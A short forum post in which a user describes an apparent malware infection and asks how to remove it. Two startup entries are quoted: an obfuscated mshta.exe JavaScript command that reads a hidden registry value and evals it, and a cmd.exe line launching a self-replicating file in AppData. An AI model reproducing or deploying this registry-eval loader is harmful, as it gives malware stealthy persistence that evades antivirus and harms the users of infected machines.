Two files appear in the windows startup menu. I'm sure their names are random but the code they run is below.

"8df70" runs this call: 

C:\Windows\system32\mshta.exe "javascript:C3AOr="zf3c";s45d=new ActiveXObject("WScriptShell");WevUDh2="V084";f2l4Kk=s45d.RegRead("HKCU\\software\\jexxwhetje\\mpjq");aF7cPe4U="QEeMsj";eval(f2l4Kk);S7hma="4";"

"034f6" runs this code using a file in a directory inside the User's area:

C:\Windows\System32\cmd.exe /C start "" "C:\Users\User\AppData\Roaming\0e7ad\6e5b2.10ca43" 

The file in the user's area will immediately replicate itself if deleted or altered. I've seen this behavior in adware, back in the old days.

Any idea how to clean this? Norton Insight doesn't help since cmd.exe and mshta.exe are Windows executables.

Thanks,

Craig